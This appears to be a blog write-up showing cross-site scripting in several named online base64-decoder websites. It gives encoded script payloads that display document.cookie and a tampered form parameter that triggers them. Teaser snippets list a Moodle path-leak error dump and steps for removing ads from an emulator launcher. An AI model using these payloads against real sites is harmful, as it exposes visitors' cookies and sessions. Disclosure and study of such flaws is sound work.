Skip to main content

http://base64-decode.php-functions.com/ | XSS

The idea is to use any data to decode (base64 in this case) and see if we can inject the xss.


http://base64-decode.php-functions.com/

other websites



http://www.motobit.com/util/base64-decoder-encoder.asp
http://www.shell-tools.net/index.php?op=base64_dec






We need to submit this string base64 encoded
 -------------------------------------------------------------
<html><head></head><body></textarea><script>alert(document.cookie);</script><textarea></body></html>
  -------------------------------------------------------------
PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjwvdGV4dGFyZWE+PHNjcmlwdD5hbGVydChkb2N1bWVu
dC5jb29raWUpOzwvc2NyaXB0Pjx0ZXh0YXJlYT48L2JvZHk+PC9odG1sPg==
 -------------------------------------------------------------


Note: The <textarea> tags are useless in this case but are working in the 90% of other similar cases that are showing the results in a textarea.


a different one with text input
 http://nc-designs.co.uk/tools/Base64 Encryption and Decryption/
----------------------------------------
"><script>alert(document.cookie);</script><"
----------------------------------------
Ij48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk7PC9zY3JpcHQ+PCI=


----------------------------------------


I've found another base64 decoder more trivial. with a few differences.
http://www.toastedspam.com/decode64
- it doesn't decode correctly the data
- it tries to remove/convert with some html entities <>


I've spent about ten minutes (sic) to achieve this XSS




The string to convert (b=a; is garbage to have a good string without random characters after decoding)
a=document.cookie; b=a; alert(a); 
The converted string
YT1kb2N1bWVudC5jb29raWU7IGI9YTsgYWxlcnQoYSk7





When we submit the data we should use tamper data (or firebug to change the html) and
change disp with script (disp=script) 


text=YT1kb2N1bWVudC5jb29raWU7IGI9YTsgYWxlcnQoYSk7&disp=script



Comments

Popular posts from this blog

Moodle 3.8.1+ - path leak via errors in several files

Moodle 3.8.1+ ----------------------------------------------- File: admin/mailout-debugger.php #!/usr/bin/php Notice : Disabled. in \admin\mailout-debugger.php on line 73 File: admin/settings/appearance.php Notice : Undefined variable: hassiteconfig in \admin\settings\appearance.php on line 10 Fatal error : Uncaught Error: Call to undefined function has_any_capability() in \admin\settings\appearance.php:10 Stack trace: #0 {main} thrown in \admin\settings\appearance.php on line 10 File: admin/settings/badges.php Notice : Undefined variable: hassiteconfig in \admin\settings\badges.php on line 30 Fatal error : Uncaught Error: Call to undefined function has_any_capability() in \admin\settings\badges.php:30 Stack trace: #0 {main} thrown in \admin\settings\badges.php on line 30 File: admin/settings/courses.php Notice : Undefined variable: hassiteconfig in \admin\settings\courses.php on line 32 Fatal error : Uncaught Error: Call to undefined function

2022 - Remove (the too many) Ads from Memu launcher

Simple method Download from pureapk "MEmu Launcher2" ex: MEmu Launcher2_v6.0.9_apkpure.com Install "System app remover" (root) remove from system apps the "memu launcher 2" import the "purified" MEmu Launcher2 apk with the Memu utility ("apk" on the right toolbar) Longer method Install "Export Apk" Export the memu launcher2  Install purify https://github.com/echo-devim/purify/raw/master/Purify.apk use purify with the exported memu launcher 2 Install "System app remover" (root) remove from system apps the "memu launcher 2" import the "purified" MEmu Launcher2 apk with the Memu utility ("apk" on the right toolbar)